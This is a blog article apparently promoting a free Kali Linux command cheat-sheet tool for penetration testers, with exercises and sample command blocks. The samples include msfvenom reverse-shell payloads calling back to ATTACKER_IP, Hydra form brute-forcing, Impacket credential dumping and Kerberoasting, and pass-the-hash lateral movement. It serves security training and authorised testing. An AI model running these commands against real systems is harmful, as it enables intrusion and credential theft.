Kali Linux Commands Cheat Sheet 2026 — 150 Tools, 2955 Commands, One Click

Mr Elite 20 min read
Kali Linux Commands Cheat Sheet 2026 — 150 Tools, 2955 Commands, One Click
⚠️ Authorised Testing Only: Every command in the SecurityElites Kali Linux Commands cheat sheet must only be used against systems you own or have explicit written authorisation to test. Unauthorised use of penetration testing tools is illegal under the CFAA, UK Computer Misuse Act, and equivalent laws worldwide.
Kali Linux commands cheat sheet 2026 — there is exactly one moment every penetration tester, CTF player, and security student has experienced: you are mid-test, you know the tool you need, but you cannot remember the exact flag combination for the specific task in front of you. You open a new tab, type the tool name into Google, wait for a result, get served a 2019 blog post with three commands and a lot of filler text, and lose five minutes you did not have. That problem is what the SecurityElites Kali Linux Commands reference was built to solve. 150 tools. 2,955 commands. Thirteen categories. One-click copy. Zero signup. Open it once and you will understand immediately.

🎯 What This Guide Covers

A full walkthrough of the SecurityElites Kali Linux Commands cheat sheet interface
How to navigate all 13 categories and 150 tools efficiently
The most valuable commands in each category that professional testers use most
How to integrate the cheat sheet into OSCP, CTF, and real engagement workflows
Pro tips for getting the most out of the one-click copy and category filter system

⏱️ 45 min read · 3 exercises · tool open by end

📊 What is your biggest frustration with Kali Linux command references?




✅ All four of those frustrations were the design brief for this tool. Browser-native, one-click copy (no PDF formatting issues), 150 tools (not just the famous 10), and a single URL to bookmark. Let’s walk through exactly how it works.

📋 What’s Inside — Kali Linux Commands Cheat Sheet Complete Guide

  1. What the SecurityElites Kali Linux Commands Cheat Sheet Actually Contains
  2. Interface Walkthrough — Categories, Filters and One-Click Copy
  3. Recon and Web App Categories — The 49 Tools You Use Most
  4. Exploitation, Password and Wireless — Attack Phase Commands
  5. Post-Exploitation, Active Directory and OSINT — Advanced Phases
  6. How to Integrate the Cheat Sheet Into OSCP, CTF and Real Engagements

The Kali Linux Commands cheat sheet at securityelites.com/tools/kali-linux-commands/ sits alongside the 180-Day Kali Linux Mastery Course as a reference layer — the course teaches you how and why each tool works, the cheat sheet gives you instant command recall during the sessions where you actually need it. Both are free, both work together, and you need both.

What the SecurityElites Kali Linux Commands Cheat Sheet Actually Contains

Most “Kali Linux cheat sheets” that appear in Google results contain 15 to 30 tools and were written in 2020. They cover Nmap, Metasploit, Hydra, and a handful of other tools that every beginner already knows. They miss the 120 tools that professional penetration testers actually use for the full engagement lifecycle — the ones where you spend 10 minutes searching for the right flag syntax because nobody covers them.

The SecurityElites Kali Linux Commands reference was built differently. It starts from the complete Kali Linux toolset and selects the 150 tools that appear most frequently in real penetration testing engagements, bug bounty workflows, OSCP lab work, and CTF competitions. For each tool, it contains every command variant a professional would actually use — not just the introductory one-liner, but the full range from basic discovery through advanced flag combinations used in real assessments.

securityelites.com
150 Tools — 13 Category Breakdown
Recon
22 tools
Nmap · Masscan · RustScan · Amass · Subfinder · DNSrecon · theHarvester · Nuclei · httpx

Web App
27 tools
Burp Suite · SQLMap · Nikto · ffuf · Gobuster · WPScan · feroxbuster · katana · ZAP

Exploitation
11 tools
Metasploit · msfvenom · searchsploit · BeEF-XSS · RouterSploit · Sliver

Password
10 tools
Hydra · Hashcat · John · Medusa · Crunch · CeWL · CUPP

Wireless
10 tools
Aircrack-ng · Wifite · Kismet · Reaver · Bettercap

Post-Exploit
10 tools
Mimikatz · BloodHound · Evil-WinRM · Impacket · CrackMapExec

OSINT
13 tools
Maltego · Shodan · SpiderFoot · Recon-ng · theHarvester

Sniffing
9 tools
Wireshark · tcpdump · Ettercap · Bettercap · Responder

Active Dir
9 tools
BloodHound · Impacket · CrackMapExec · Rubeus · Kerbrute

+ Vuln Assessment (11) · Forensics (11) · Crypto (5) · Network (2)

📸 SecurityElites Kali Linux Commands — 150 tools across 13 categories. Recon has the most tools at 22, Web App is the largest at 27. Active Directory and Post-Exploitation cover the full modern AD attack stack.

Interface Walkthrough — Categories, Filters and One-Click Copy

The tool loads at securityelites.com/tools/kali-linux-commands/ with zero page load overhead — no account, no cookie consent wall, no email gate. The interface has three zones: the category filter bar at the top, the tool list on the left, and the command display panel on the right.

The category filter bar contains 14 pills: All (150 tools) plus the 13 category names. Clicking a category pill immediately filters the tool list on the left to only show tools in that category. The tool count updates in real time — clicking Recon shows 22 tools, Web App shows 27. This is the fastest way to navigate when you know the category but not the specific tool name.

The tool list on the left is a scrollable panel of tool names. Clicking any tool name loads all commands for that tool in the main display panel. The display panel shows each command on its own row with a description of what it does and a Copy button aligned to the right. Clicking Copy copies the complete command string to your clipboard with the correct syntax, flags, and spacing preserved exactly as written — no PDF rendering artefacts, no line break corruption.

🛠️ EXERCISE 1 — BROWSER (10 MIN · NO INSTALL)
Open the Cheat Sheet and Complete a Full Tool Exploration Across 3 Categories

⏱️ Time: 10 minutes · Browser only · no account required

Step 1: Open the tool in a new tab:
securityelites.com/tools/kali-linux-commands/

Step 2: Note the stats at the top:
– How many tools total?
– How many commands total?
– How many categories?

Step 3: Click the “Recon” category pill
– How many tools are listed?
– Click “Nmap” — how many Nmap commands are shown?
– Find the command for a full service version scan
with OS detection and default scripts
– Click Copy on that command

Step 4: Click the “Web App” category pill
– Click “SQLMap” in the tool list
– Find the command for dumping a specific database table
– Copy it

Step 5: Click the “Active Dir” category pill
– Click “BloodHound” or “CrackMapExec”
– Find a lateral movement or credential spray command
– Copy it

Step 6: Click “All (150)” to return to the full tool list
– Use the tool search/filter to find “Hashcat”
– How many Hashcat commands are available?
– Find the command for cracking NTLM hashes (mode 1000)

Step 7: Bookmark the tool URL for instant access during
your next CTF, OSCP lab session, or test engagement

✅ What you just learned: The three-click workflow — Category → Tool → Copy — gets you any command in the entire 150-tool database in under 5 seconds. The category filter is the key efficiency gain over searching individual tool man pages: if you know you are in the web application phase, clicking Web App shows all 27 relevant tools in one panel. The bookmark in Step 7 is the most important action — this tool replaces a folder full of cheat sheet PDFs and a dozen open browser tabs during testing sessions.

📸 Screenshot the tool open with a command copied and share in #kali-commands on Discord.

Recon and Web App Categories — The 49 Tools You Use Most

The Recon category is where every engagement starts. Twenty-two tools covering the full reconnaissance spectrum — from initial host discovery with Netdiscover and Nmap through subdomain enumeration with Amass and Subfinder, DNS intelligence with DNSrecon and dnsx, web content discovery with httpx and EyeWitness, and automated vulnerability detection with Nuclei. For a category that contains the foundation of every assessment, having all 22 tools with their full command sets in one panel eliminates the context switching that breaks focus during recon phases.

The most commonly referenced commands in the Recon category during professional assessments are the Nmap combination flags. The classic service scan — nmap -sV -sC -p- --open TARGET — appears in every pentest report preamble, but the tool contains the full range beyond the basics: NSE script categories, timing templates, output formats for all four file types, and the specific flag combinations for OSCP-style enumeration methodology. If you have ever spent 90 seconds trying to remember whether it is -oA or -oN for saving output, those 90 seconds are gone with one click.

SAMPLE COMMANDS AVAILABLE IN THE TOOL — RECON CATEGORY
# Nmap — these are in the tool, each with one-click copy:
nmap -sV -sC -p- –open -oN full_scan.txt TARGET
nmap -sU –top-ports 200 TARGET
nmap –script vuln -p 80,443,8080 TARGET
# Subfinder — subdomain enumeration
subfinder -d target.com -all -recursive -o subs.txt
# httpx — probe subdomains for live hosts
httpx -l subs.txt -title -status-code -tech-detect -o live.txt
# Nuclei — template-based vulnerability scanning
nuclei -l live.txt -t exposures/ -severity critical,high -o nuclei.txt
# RustScan — fast port scanning before full Nmap
rustscan -a TARGET –ulimit 5000 — -sV -sC

The Web App category is the largest at 27 tools — reflecting the reality that web application testing now constitutes the majority of both bug bounty work and external penetration testing engagements. Burp Suite commands cover proxy configuration, Intruder attack types, and the Turbo Intruder integration that Day 16 of the Bug Bounty course covered. SQLMap commands span the full injection methodology from detection flags through database enumeration and data dumping with WAF bypass tamper scripts included. The directory busting trio — Gobuster, ffuf, and Feroxbuster — each have multiple command variants covering different wordlist strategies, extension filtering, and output formats.

Exploitation, Password and Wireless — Attack Phase Commands

The Exploitation category covers 11 tools and represents the phase most learners focus on first but actually use least in professional assessments — because most real-world engagements do not reach the point of running Metasploit exploits. Understanding the exploitation tools in context means knowing when to use them versus manual exploitation approaches. The cheat sheet includes full Metasploit module workflow commands, msfvenom payload generation for all major platforms including PHP, ASP, Python, PowerShell, and ELF, and searchsploit query syntax for finding applicable exploits from the offline ExploitDB database during network-restricted engagements like OSCP.

The Password category is where the cheat sheet saves the most time during actual testing. Hydra’s flag syntax — particularly the service-specific format differences between HTTP form attacks, SSH, FTP, and SMB — is genuinely difficult to remember without reference. The difference between http-post-form and http-form-post, the exact format of the colon-separated field string, and the success/failure string syntax are all present in the tool with working examples. Hashcat mode numbers are similarly reference-heavy: mode 0 for MD5, 100 for SHA1, 1000 for NTLM, 1800 for SHA-512crypt, 13100 for Kerberoast — the tool lists all major hash modes with their corresponding numbers.

SAMPLE COMMANDS — EXPLOITATION AND PASSWORD CATEGORIES
# msfvenom — PHP reverse shell payload generation
msfvenom -p php/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f raw > shell.php
# msfvenom — Windows executable payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe -o payload.exe
# Hydra — HTTP POST form brute force
hydra -L users.txt -P passwords.txt TARGET http-post-form “/login.php:username=^USER^&password=^PASS^:Invalid credentials”
# Hashcat — crack NTLM hashes (mode 1000)
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt –show
# Hashcat — Kerberoast TGS ticket cracking (mode 13100)
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule
# searchsploit — find exploits for a specific service version
searchsploit “Apache 2.4” –www

Post-Exploitation, Active Directory and OSINT — Advanced Phases

The Post-Exploitation and Active Directory categories are where the cheat sheet most significantly outperforms every other free command reference. There is almost no comprehensive free resource that covers Impacket’s full suite — psexec, wmiexec, smbexec, secretsdump, GetNPUsers, GetUserSPNs — with working command syntax and the correct credential format variations for hash-only attacks. The SecurityElites cheat sheet covers all of them across the Post-Exploitation and Active Directory categories, making it the go-to reference during the AD attack phases covered in Days 23–50 of the Ethical Hacking course.

BloodHound’s Python-based data collection commands, the Cypher query syntax for finding attack paths, and the command-line flags for CrackMapExec’s various execution modes are all present. Rubeus commands for Kerberoasting, AS-REP roasting, and ticket manipulation round out the Kerberos attack coverage. For OSCP students doing the Active Directory sets, having every Impacket and CrackMapExec command available in one browser tab is a significant time saver during timed exam conditions.

SAMPLE COMMANDS — ACTIVE DIRECTORY AND POST-EXPLOITATION
# Impacket — remote credential dump
impacket-secretsdump DOMAIN/USER:PASS@TARGET_IP
# Impacket — Kerberoasting (find SPNs and request tickets)
impacket-GetUserSPNs DOMAIN/USER:PASS -dc-ip DC_IP -request -outputfile kerberoast.txt
# Impacket — AS-REP roasting (no pre-auth users)
impacket-GetNPUsers DOMAIN/ -dc-ip DC_IP -usersfile users.txt -format hashcat -outputfile asreproast.txt
# CrackMapExec — SMB credential testing across subnet
crackmapexec smb 192.168.1.0/24 -u administrator -H :NTLM_HASH –local-auth
# Evil-WinRM — interactive PS session with hash
evil-winrm -i TARGET_IP -u administrator -H NTLM_HASH
# BloodHound Python — collect AD data from Kali
bloodhound-python -d DOMAIN -u USER -p PASS -dc DC_IP -c All –zip

The OSINT category covers 13 tools including Maltego, Shodan CLI, SpiderFoot, Recon-ng, theHarvester, Amass OSINT mode, and the crt.sh curl commands that pull certificate transparency data without a web interface. The sniffing category covers Wireshark display filter syntax — one of the most referenced but least memorisable command sets in all of Kali — alongside tcpdump capture filters, Responder configuration, and Bettercap network manipulation commands.

🧠 EXERCISE 2 — THINK LIKE A HACKER (10 MIN · NO TOOLS)
Map the Right Cheat Sheet Category to Each Phase of a Real Penetration Test

⏱️ Time: 10 minutes · No tools required

You are conducting an external penetration test against a
mid-sized company. You have the target domain: company.com
and permission to test all internet-facing infrastructure.

Map each phase below to the correct category in the cheat sheet
AND name one specific tool from that category you would use:

PHASE 1: Discover all internet-facing IPs and subdomains
→ Category: ___ | Tool: ___

PHASE 2: Identify web technologies and check for live web apps
→ Category: ___ | Tool: ___

PHASE 3: Directory brute force a login portal found on port 8443
→ Category: ___ | Tool: ___

PHASE 4: Test the login portal for SQL injection
→ Category: ___ | Tool: ___

PHASE 5: You found default credentials. Capture the WPA2 key
from a wireless access point found during physical recon
→ Category: ___ | Tool: ___

PHASE 6: You have a low-priv shell. Extract password hashes
→ Category: ___ | Tool: ___

PHASE 7: Crack the extracted NTLM hashes offline
→ Category: ___ | Tool: ___

PHASE 8: Use hashes to move laterally to the Domain Controller
→ Category: ___ | Tool: ___

For each phase — open the cheat sheet and verify which specific
command you would use. Can you find it in under 10 seconds?

✅ What you just learned: The eight-phase mapping exercise makes the category system intuitive by connecting abstract categories to real assessment phases. Phase 1=Recon (Subfinder/Amass), Phase 2=Recon (httpx/EyeWitness), Phase 3=Web App (ffuf/Gobuster), Phase 4=Web App (SQLMap), Phase 5=Wireless (Aircrack-ng/Wifite), Phase 6=Post-Exploit (Impacket secretsdump), Phase 7=Password (Hashcat), Phase 8=Active Dir (CrackMapExec/Evil-WinRM). Once you map assessment phases to categories, the cheat sheet navigation becomes instinctive — you click the category for your current phase, not the category for a specific tool name.

📸 Write your completed phase mapping and share in #kali-commands on Discord.

How to Integrate the Cheat Sheet Into OSCP, CTF and Real Engagements

The cheat sheet is not a learning tool — it is a recall tool. The difference matters for how you use it. You should not be reading the cheat sheet to understand what a tool does. You should be opening it when you know exactly what you need but cannot remember the precise syntax. The workflow for each scenario type is different.

For OSCP lab work: Keep the cheat sheet open in a dedicated browser tab throughout every lab session. The OSCP exam’s 23-hour time pressure punishes the 90-second searches for flag syntax. Before each tool you intend to use, spend 30 seconds reviewing its commands in the cheat sheet — this primes your memory and ensures you are using the most appropriate flags for your specific objective. The Active Directory and Post-Exploitation categories are especially valuable during the AD set machines where you cycle through multiple Impacket tools in sequence.

For CTF competitions: CTFs introduce novel challenges but always use standard tools. The cheat sheet’s 13-category structure matches the CTF challenge categories — web exploitation aligns with Web App, crypto challenges align with the Crypto category, forensics challenges align with Volatility and Autopsy commands in the Forensics category. During timed CTF events, having the copy functionality means you can run commands from the reference without retyping — reducing typo-related wasted time.

For bug bounty recon: The Recon and OSINT categories together give you the complete automated recon pipeline. The cheat sheet contains the exact Subfinder, httpx, Nuclei, and gau command chains that feed into a professional bug bounty recon workflow. Copy the commands in sequence, substitute your target domain, and run them in parallel terminal windows without stopping to look up any syntax.

For professional engagements: The most valuable professional use of the cheat sheet is pre-engagement preparation. Before connecting to a client network, spend 15 minutes reviewing the categories relevant to the scope — if it is an AD engagement, review the Active Directory and Post-Exploitation categories and have the key commands bookmarked. This replaces the “notebook of notes” that experienced testers carry — and unlike a handwritten notebook, the one-click copy means zero transcription errors when running commands against live infrastructure.

🛠️ EXERCISE 3 — BROWSER ADVANCED (15 MIN)
Build Your Personal Quick-Access Command Set From the Cheat Sheet

⏱️ Time: 15 minutes · Browser · text editor

Open securityelites.com/tools/kali-linux-commands/ and
build a personal “Day 1 Recon” command file — the first 15
commands you run when starting any new target.

Step 1: Click Recon category
Step 2: For each tool below, find your preferred command
and paste it into a text file:

TOOL COMMAND TYPE TO FIND
Nmap → Full TCP port scan + service detection
RustScan → Fast initial scan feeding into Nmap
Subfinder → All-source subdomain enumeration
Amass → Passive subdomain enumeration
httpx → Probe live subdomains with tech detect
DNSrecon → Zone transfer attempt + A record enum
theHarvester → Email + subdomain OSINT
EyeWitness → Screenshot web apps from URL list
Nuclei → Fast vuln scan against live targets

Step 3: Click Web App category — add these:
Gobuster → Directory brute force on live hosts
ffuf → VHOST discovery
Nikto → Web server vulnerability scan

Step 4: Save your personal “Day 1 Recon” command file with
TARGET placeholder substituted

Step 5: Time yourself: how long did it take to assemble
these 12 commands from the cheat sheet?
Compare that to assembling them from man pages.

Bonus: Add 3 commands from the OSINT category for passive
recon before any active scanning begins.

✅ What you just learned: Building your personal command workflow from the cheat sheet turns a reference tool into an operational asset. The “Day 1 Recon” file you just built is a reusable script template — substitute TARGET on the first use and it becomes your standard opening recon sequence for every engagement. The time comparison (Step 5) usually shows 3–8 minutes from the cheat sheet vs 30–45 minutes from man pages and Google. That time difference, multiplied across every assessment, is the productivity case for keeping the cheat sheet open in every testing session.

📸 Screenshot your completed “Day 1 Recon” command file and share in #kali-commands on Discord. Tag #kalicommands2026

🧠 QUICK CHECK — Kali Linux Commands Cheat Sheet

You need to crack a set of Kerberoasted TGS tickets you extracted during an AD assessment. You know Hashcat is the tool but cannot remember the mode number for Kerberos 5 TGS-REP etype 23. What is the fastest way to find the correct command?



🔖 The SecurityElites Kali Linux Commands Tool — At a Glance

URLsecurityelites.com/tools/kali-linux-commands/ — bookmark this now
150 toolsEvery major Kali Linux penetration testing tool across the full assessment lifecycle
2,955+ commandsNot just one-liners — full flag variations for real assessment scenarios
13 categoriesRecon · Web App · Exploit · Password · Wireless · Post-Exploit · OSINT · Sniffing · Vuln Assess · Forensics · Crypto · Active Dir · Network
One-click copyExact command syntax copied to clipboard — no PDF formatting corruption
Free · No signupOpen in browser, start using immediately — zero barriers
Mobile-responsiveWorks on phone and tablet — reference commands during tests away from your main machine

❓ Frequently Asked Questions

How many tools and commands does the SecurityElites Kali Linux cheat sheet cover?
150 tools and 2,955+ commands across 13 categories. Recon has 22 tools, Web App has 27 (the largest category), and every major phase of penetration testing is covered including Active Directory, Post-Exploitation, and forensics tools not found in most other free references.
Is the Kali Linux commands cheat sheet free?
Completely free with no account or email required. Navigate to securityelites.com/tools/kali-linux-commands/ and the full tool loads immediately with all categories, filters, tool selection, and one-click copy available instantly.
What categories does the Kali Linux cheat sheet cover?
13 categories: Recon (22 tools including Nmap, Subfinder, Nuclei), Web App (27 tools including Burp Suite, SQLMap, ffuf), Exploitation (11 tools including Metasploit, msfvenom), Password Attacks (10 tools including Hashcat, Hydra), Wireless, Post-Exploitation, OSINT, Sniffing, Vulnerability Assessment, Forensics, Cryptography, Active Directory, and Network.
Can I use this cheat sheet on mobile?
Yes — fully mobile-responsive. All category filters, tool selection, command display, and one-click copy work on mobile browsers. Useful during CTFs and field engagements where you need a command reference without opening a laptop.
Is this cheat sheet suitable for OSCP preparation?
Yes — it covers all OSCP-relevant tools: Nmap enumeration syntax, Gobuster/ffuf for web content discovery, SQLMap for injection, Hydra and Hashcat for credential attacks, Metasploit for exploitation, and the full Impacket/CrackMapExec/BloodHound stack for the Active Directory exam sets.
How often is the Kali Linux commands cheat sheet updated?
Updated as Kali rolls new tool versions and as modern tool workflows evolve. Recent additions include Go-based recon tools (httpx, dnsx, nuclei), modern AD attack tools (BloodHound Python, NetExec), and cloud security tools. Check the live tool for the current command set.
← Related

Kali Linux Post Installation Steps 2026

Related →

180-Day Kali Linux Mastery Course

📚 Further Reading

  • Kali Linux Commands Cheat Sheet — The Tool — The tool this article is about — open it directly, bookmark it, and keep it in every testing session. 150 tools, 2,955+ commands, free, one-click copy.
  • Kali Linux Post Installation Steps 2026 — Before using the commands cheat sheet, make sure your Kali environment is properly configured — all 15 post-installation steps that ensure every tool in the reference actually works when you run it.
  • 180-Day Kali Linux Mastery Course — The course that teaches you why every command in the cheat sheet works — use both together: the course for understanding, the cheat sheet for recall during active testing sessions.
  • How to Set Up a Hacking Lab 2026 — The lab environment where you practice every command in the cheat sheet — Kali Linux, Metasploitable 2, and DVWA on an isolated VirtualBox network, free to build on any hardware.
  • Kali Linux Official Tool Documentation — The official Kali Linux tool index with individual documentation pages for every tool in the distribution — use alongside the SecurityElites cheat sheet when you need deeper parameter explanations.
ME
Mr Elite
Owner, SecurityElites.com
I built the Kali Linux Commands cheat sheet because I got tired of the same problem on every single engagement. Mid-test, I knew what tool I needed, I knew roughly what I wanted it to do, and I wasted three to seven minutes searching for the exact syntax every time. My notes were scattered across text files, my PDF cheat sheets had line breaks in the wrong places when I copied from them, and the tool-specific man pages buried the commands I needed under 300 lines of rarely-used flags. The cheat sheet started as a personal file I kept updated for my own use. When I put it online the first time, people spent three months telling me to add more tools. I added more tools. Then more. Then reorganised it into categories. Then built the filter and copy system. The version that is live now is the tool I wish had existed when I started. 150 tools, 2,955 commands, one click. Open it. Bookmark it. Keep it open during every test you run.

kali linux cheat sheet pdf kali linux commands list 2026 kali linux penetration testing commands kali linux tool reference
Join free to earn XP for reading this article Track your progress, build streaks and compete on the leaderboard.
Join Free

Leave a Reply

Your email address will not be published. Required fields are marked *